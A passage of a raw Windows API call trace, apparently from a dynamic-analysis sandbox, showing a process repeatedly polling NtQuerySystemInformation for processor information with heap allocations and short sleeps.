0x29585b8 [0209.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.803] Sleep (dwMilliseconds=0x110) [0209.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.821] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.821] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.822] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.822] Sleep (dwMilliseconds=0x110) [0209.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.894] Sleep (dwMilliseconds=0x110) [0209.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.958] Sleep (dwMilliseconds=0x110) [0210.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.020] Sleep (dwMilliseconds=0x110) [0210.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.083] Sleep (dwMilliseconds=0x110) [0210.147] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.147] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.154] Sleep (dwMilliseconds=0x110) [0210.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.176] Sleep (dwMilliseconds=0x110) [0210.229] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.229] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.230] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.230] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.230] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.230] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.230] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.231] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.276] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.277] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.277] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.277] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.279] Sleep (dwMilliseconds=0x110) [0210.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.305] Sleep (dwMilliseconds=0x110) [0210.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.318] Sleep (dwMilliseconds=0x110) [0210.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.333] Sleep (dwMilliseconds=0x110) [0210.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.352] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.352] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.352] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.353] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.353] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.355] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.355] Sleep (dwMilliseconds=0x110) [0210.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 